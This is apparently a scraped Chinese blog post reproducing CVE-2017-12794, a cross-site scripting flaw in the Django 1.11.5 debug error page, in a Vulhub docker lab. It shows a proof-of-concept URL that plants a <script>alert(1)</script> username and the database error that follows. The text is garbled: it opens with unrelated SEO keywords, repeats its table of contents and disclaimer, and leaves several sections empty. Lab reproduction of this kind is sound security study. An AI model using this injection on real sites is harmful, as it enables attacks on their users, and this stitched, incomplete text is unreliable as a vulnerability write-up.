网站建设的主流架构有哪些,烟台seo管理,大数据营销网站,推广渠道有哪些感谢互联网提供分享知识与智慧#xff0c;在法治的社会里#xff0c;请遵守有关法律法规 文章目录 1.1、漏洞描述1.2、漏洞等级1.3、影响版本1.4、漏洞复现1、基础环境2、漏洞分析3、漏洞验证 说明内容漏洞编号CVE-2017-12794漏洞名称Django_debug page_XSS漏洞漏洞评级影响范… 感谢互联网提供分享知识与智慧在法治的社会里请遵守有关法律法规 文章目录 1.1、漏洞描述1.2、漏洞等级1.3、影响版本1.4、漏洞复现1、基础环境2、漏洞分析3、漏洞验证 说明内容漏洞编号CVE-2017-12794漏洞名称Django_debug page_XSS漏洞漏洞评级影响范围1.11.5版本漏洞描述修复方案
1.1、漏洞描述
1.11.5版本修复了500页面中存在的一个XSS漏洞
1.2、漏洞等级
1.3、影响版本
Django 1.11.5版本
1.4、漏洞复现
1、基础环境
PathVulhub/django/CVE-2017-12794 启动测试环境
sudo docker-compose up -d访问http://your-ip:8000/即可看到 2、漏洞分析
vulhub
3、漏洞验证
http://192.168.8.8:8000/create_user/?username%3Cscript%3Ealert(1)%3C/script%3E用户已经被 创建 再次刷新页面触发XSS 抛出异常 duplicate key value violates unique constraint xss_user_username_key
DETAIL: Key (username)(scriptalert(1)/script) already exists.
